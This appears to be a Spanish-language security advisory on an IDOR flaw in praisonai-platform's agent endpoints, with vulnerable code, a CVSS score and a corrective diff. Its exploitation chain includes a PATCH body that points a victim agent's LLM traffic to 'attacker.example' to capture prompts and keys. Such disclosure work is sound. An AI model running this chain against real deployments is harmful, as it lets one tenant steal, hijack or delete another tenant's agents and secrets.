Resumen

Tipo: Insecure Direct Object Reference (IDOR). Los endpoints CRUD de agentes (GET / PATCH / DELETE /workspaces/{workspace_id}/agents/{agent_id}) controlan el acceso únicamente mediante require_workspace_member(workspace_id), luego resuelven agent_id a través de AgentService.get(agent_id) que es una búsqueda por clave primaria sin restricción de workspace. Un usuario miembro de cualquier workspace W1 puede leer, modificar o eliminar agentes que pertenecen a un workspace diferente W2 adivinando o recolectando un UUID de agente y llamando …/workspaces/W1/agents/<W2-agent-id>.

Archivo: src/praisonai-platform/praisonai_platform/services/agent_service.py, líneas 53-112; manejadores de rutas en src/praisonai-platform/praisonai_platform/api/routes/agents.py, líneas 53-100.

Causa raíz: la ruta extrae workspace_id del path URL y lo pasa a require_workspace_member para la verificación de membresía, pero nunca lo transmite a la capa de servicio. AgentService.get llama session.get(Agent, agent_id), que es SELECT * FROM agents WHERE id = :agent_id sin AND workspace_id = :workspace_id. Los métodos update y delete llaman primero self.get(agent_id) y luego mutan la fila devuelta, heredando la misma brecha. El MemberService es el único lugar en este código que lo hace correctamente: usa (workspace_id, user_id) como clave compuesta. El servicio de agentes simplemente olvidó el segundo predicado, que es el patrón textbook GHSA para servicios FastAPI que tratan los parámetros de enrutamiento como decorativos en lugar de autoritativos.

Código Afectado

Archivo 1: src/praisonai-platform/praisonai_platform/services/agent_service.py, líneas 53-55 y 105-112.

python
class AgentService:
    ...

    async def get(self, agent_id: str) -> Optional[Agent]:
        """Get agent by ID."""
        return await self._session.get(Agent, agent_id)            # <-- BUG: sin predicado workspace_id

    async def update(
        self,
        agent_id: str,
        name: Optional[str] = None,
        ...
    ) -> Optional[Agent]:
        agent = await self.get(agent_id)                           # <-- hereda la misma brecha
        if agent is None:
            return None
        ...
        return agent

    async def delete(self, agent_id: str) -> bool:
        agent = await self.get(agent_id)                           # <-- hereda la misma brecha
        if agent is None:
            return False
        await self._session.delete(agent)
        await self._session.flush()
        return True

Archivo 2: src/praisonai-platform/praisonai_platform/api/routes/agents.py, líneas 53-101.

python
@router.get("/{agent_id}", response_model=AgentResponse)
async def get_agent(
    workspace_id: str,
    agent_id: str,
    user: AuthIdentity = Depends(require_workspace_member),         # solo verifica membresía en workspace_id
    session: AsyncSession = Depends(get_db),
):
    svc = AgentService(session)
    agent = await svc.get(agent_id)                                 # <-- workspace_id nunca pasado; svc.get devuelve cualquier agente en la BD
    if agent is None:
        raise HTTPException(status_code=404, detail="Agent not found")
    return AgentResponse.model_validate(agent)

Los manejadores update_agent (líneas 67-87) y delete_agent (líneas 90-100) exhiben el mismo patrón: reciben workspace_id vía parámetro de path, lo usan únicamente para la puerta de membresía, luego llaman svc.update(agent_id, ...) / svc.delete(agent_id) sin re-verificar a qué workspace pertenece realmente el agente.

Por qué está mal: el segmento workspace_id en la ruta se trata como una pista de UI (controla "¿estás en algún workspace W?") en lugar de un predicado autoritativo (también debería controlar "¿el recurso que estás direccionando está realmente dentro de W?"). Una corrección estándar en servicios FastAPI/SQLAlchemy es hacer que la consulta de búsqueda de recursos incluya el predicado de workspace y tratar la ausencia como 404, para que un agente de workspace foráneo sea indistinguible de uno inexistente.

Cadena de Explotación

  1. El atacante registra dos cuentas (o recluta un miembro de workspace) y crea dos workspaces: W_attacker (el atacante es miembro) y obtiene un agent_id conocido de W_target (un workspace del cual el atacante NO es miembro). Los IDs de agente son strings uuid4 (default de columna BD), pero se filtran a través de varios canales laterales: endpoints de lista de usuarios cuando un agente se menciona en el cuerpo de un issue, el feed de actividad (activity.py:log registra entity_id=agent.id), payloads de webhook, mensajes de error, dumps de issues exportados, o simplemente por enumeración si el despliegue no rota IDs frecuentemente.

  2. El atacante se autentica y hace POST Authorization: Bearer <attacker_jwt> a GET /workspaces/W_attacker/agents/A_T. require_workspace_member(W_attacker, attacker) devuelve la identidad del atacante (son miembro de W_attacker). El flujo de control entra en get_agent con workspace_id=W_attacker, agent_id=A_T.

  3. AgentService.get(A_T) ejecuta session.get(Agent, "A_T"), que es SELECT * FROM agents WHERE id = 'A_T' LIMIT 1. La consulta no tiene filtro workspace_id = 'W_attacker' y devuelve la fila, incluyendo sus instructions, runtime_config, name, status, owner_id, etc, aunque agent.workspace_id == 'W_target'. El cuerpo de respuesta es el agente objetivo serializado en JSON.

  4. El atacante repite con PATCH /workspaces/W_attacker/agents/A_T y un cuerpo de {"instructions": "<prompt de sistema malicioso>", "runtime_mode": "cloud", "runtime_config": {"api_base": "https://attacker.example/v1", "api_key": "<exfil>"}}. update_agent llama svc.update(A_T, ...) que carga la fila objetivo y muta los campos listados. El agente del workspace foráneo ahora tiene instrucciones elegidas por el atacante y enruta su tráfico LLM a través de attacker.example.

  5. El atacante llama DELETE /workspaces/W_attacker/agents/A_T para eliminar completamente el agente objetivo, o repite el paso 4 contra cada UUID de agente que pueda recolectar. La flota de agentes del workspace objetivo es destruida o comprometida con backdoors.

Impacto de Seguridad

Severidad: sec-high. CVSS 8.1: ataque de red, baja complejidad, bajos privilegios (cualquier miembro de workspace autenticado), sin interacción de usuario, alcance sin cambios (el contexto de autenticación es el mismo componente), alta confidencialidad (registro completo de agente incluyendo instrucciones y configuración de runtime), alta integridad (escrituras arbitrarias), baja disponibilidad (DELETE elimina agentes objetivo).

Capacidad del atacante: con un token de miembro de workspace más un UUID de agente recolectado o adivinado, un atacante puede leer las instructions del agente objetivo (frecuentemente un prompt de sistema propietario), runtime_config (frecuentemente contiene URLs de proveedores LLM y claves API cuando el despliegue usa BYOK), owner_id, y estado; reescribir los mismos campos para redirigir el tráfico LLM del agente a un endpoint controlado por el atacante (proxy-y-log de cada prompt, inyección de prompt de cada respuesta); cambiar status a error para romper silenciosamente la flota de agentes de un workspace competidor; o eliminar los agentes completamente.

Precondiciones: praisonai-platform está desplegado multi-tenant (existe más de un workspace); el atacante tiene cualquier token de membresía; el UUID del agente objetivo es conocido o adivinable (la aleatoriedad uuid4 es grande pero los UUIDs se filtran a través de feeds de actividad, payloads de webhook, menciones de issues, mensajes de error, y capturas de pantalla del operador).

Corrección Sugerida

Hacer que cada búsqueda de recurso de fila única tome el predicado de workspace. Tratar filas de workspace foráneo como 404, no 200, para que el endpoint ni siquiera confirme que el ID objetivo existe.

diff
--- a/src/praisonai-platform/praisonai_platform/services/agent_service.py
+++ b/src/praisonai-platform/praisonai_platform/services/agent_service.py
@@ -50,9 +50,12 @@ class AgentService:
         await self._session.flush()
         return agent
 
-    async def get(self, agent_id: str) -> Optional[Agent]:
-        """Get agent by ID."""
-        return await self._session.get(Agent, agent_id)
+    async def get(self, workspace_id: str, agent_id: str) -> Optional[Agent]:
+        """Get agent by ID, scoped to a workspace."""
+        stmt = select(Agent).where(
+            Agent.id == agent_id, Agent.workspace_id == workspace_id
+        )
+        return (await self._session.execute(stmt)).scalar_one_or_none()

Los manejadores de rutas en routes/agents.py entonces necesitan pasar workspace_id a cada llamada svc.get/update/delete. Repetir el patrón para IssueService, ProjectService, CommentService, y LabelService, que exhiben la misma búsqueda de clave única.